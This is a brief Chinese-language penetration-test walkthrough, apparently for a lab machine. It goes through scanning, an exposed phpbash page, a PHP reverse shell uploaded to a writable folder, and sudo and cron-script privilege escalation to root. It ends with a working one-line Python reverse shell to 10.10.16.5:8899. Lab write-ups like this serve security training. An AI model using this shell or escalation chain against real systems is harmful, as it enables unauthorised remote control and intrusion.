本文共 888 字，大约阅读时间需要 2 分钟。

过程概述

1. nmap扫描靶机，开放了80http服务。
2. dirsearch扫描网站目录。
3. nikto扫描网站漏洞。
4. 手动访问网站，发现了phpbash的介绍页面，了解了下感觉可以利用，需要找到phpbash.php页面。根据dirsearch和nikto的扫描结果中，找到了在dev/phpbash.php。获取user.txt
5. 网站目录下的uploads文件夹具有可写入权限，上传回连shell的PHP文件，并浏览器访问，成功建立连接。
6. sudo -l，发现可以以scriptmanager用户执行任何命令，sudo -u scriptmanager bash -i，切换到scriptmanager下的bash。
7. /scripts目录下有个test.py目录，可以写入，并且定期会以root命令执行，想test.py中重新写入回连shell，开启监听，等一段时间后建立连接，获取root.txt。

关键步骤

回连shell1

用的是/usr/share/laudanum/php/php-reverse-shell.php，修改相应的IP和端口。

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

回连shell2

用的echo将脚本写入到了test.py文件中。

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",8899));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);